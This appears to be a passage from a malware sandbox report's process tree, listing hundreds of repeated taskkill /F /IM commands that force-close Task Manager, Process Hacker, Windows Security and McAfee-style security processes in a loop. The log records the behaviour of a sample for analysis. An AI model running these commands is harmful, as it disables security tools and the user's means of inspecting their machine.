- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:2972
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:2288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1500
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5304
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:3252
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5452
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  - Kills process with taskkill
  PID:6080
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5892
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5220
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5684
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:4148
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5600
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:628
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5920
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4504
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:6024
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5744
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Kills process with taskkill
  PID:5740
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2224
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5376
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5264
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5816
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5136
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5888
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2028
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:3804
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:4864
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:3652
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1616
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5228
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:6076
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2888
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:624
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Kills process with taskkill
  PID:5476
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5136
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5940
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:3840
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:6120
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1032
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:6004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5440
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5980
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5848
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1512
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3052
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:6068
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:3824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4696
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:6132
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:628
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5400
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1260
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  - Kills process with taskkill
  PID:5964
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1996
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3460
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3916
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4688
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5876
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4164
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5740
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4892
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5892
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5940
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2908
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5304
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6076
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2296
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:372
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5700
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2844
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:6084
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4752
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:1032
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1520
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2464
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5876
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5980
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2200
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1064
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5644
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5184
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4780
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5768
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:1492
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5496
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:3632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:4340
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5368
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4144
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1956
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4940
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Kills process with taskkill
  PID:5268
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5848
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:2824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  - Kills process with taskkill
  PID:4692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:6000
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:2200
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5888
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5316
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4780
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5784
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3460
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3672
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  - Kills process with taskkill
  PID:5516
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:1124
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:1336
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:6120
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  - Kills process with taskkill
  PID:5292
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:800
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:4940
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5552
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5940
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5768
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5184
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4576
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5600
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:3436
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5140
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:644
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5480
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5976
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3916
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5516
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3864
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2212
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6024
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5956
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:4948
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:1512
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5552
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  - Kills process with taskkill
  PID:2992
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:756
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5200
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  - Kills process with taskkill
  PID:2284
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5964
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4504
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2300
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:1124
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  - Kills process with taskkill
  PID:3560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:6004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2592
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:1948
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3772
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5472
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2776
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5920
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6100
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2844
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:3052
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4356
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:372
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3804
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:2244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2884
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5960
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5164
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3168
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5144
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5876
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:2028
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:2768
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:6140
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5548
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:1664
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5700
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2200
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  - Kills process with taskkill
  PID:2412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:3812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3836
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4780
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:1856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:2456
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5684
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5252
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4164
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5956
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3168
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5276
- C:\Windows\System32\taskkill.exe
